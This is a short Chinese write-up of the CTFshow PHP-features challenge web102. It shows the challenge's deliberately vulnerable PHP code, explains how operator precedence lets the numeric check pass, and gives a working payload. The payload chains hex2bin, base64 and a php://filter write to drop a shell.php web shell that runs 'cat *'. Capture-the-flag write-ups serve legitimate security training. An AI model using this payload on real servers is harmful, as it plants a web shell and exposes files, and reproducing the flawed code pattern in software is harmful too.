CTFshow-WEB入门-php特性web102

题目代码

<?php
/*
# -*- coding: utf-8 -*-
# @Author: atao
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-23 20:59:43
*/
highlight_file(__FILE__);
$v1 = $_POST['v1'];
$v2 = $_GET['v2'];
$v3 = $_GET['v3'];
$v4 = is_numeric($v2) and is_numeric($v3);
if($v4){
    $s = substr($v2,2);
    $str = call_user_func($v1,$s);
    echo $str;
    file_put_contents($v3,$str);
}
else{
    die('hacker');
}

因为优先级 is_numeric($v2) 为true，$v4即为true

$v2可以由 数字e数字 组成

16进制 115044383959474e6864434171594473 转字符串再base64解码为<?=`cat *`;

写入文件：file_put_contents('php://filter/write=convert.base64-decode/resource=shell.php', hex2bin('115044383959474e6864434171594473'))

Payload：

v1=hex2bin

?v2=00115044383959474e6864434171594473&v3=php://filter/write=convert.base64-decode/resource=shell.php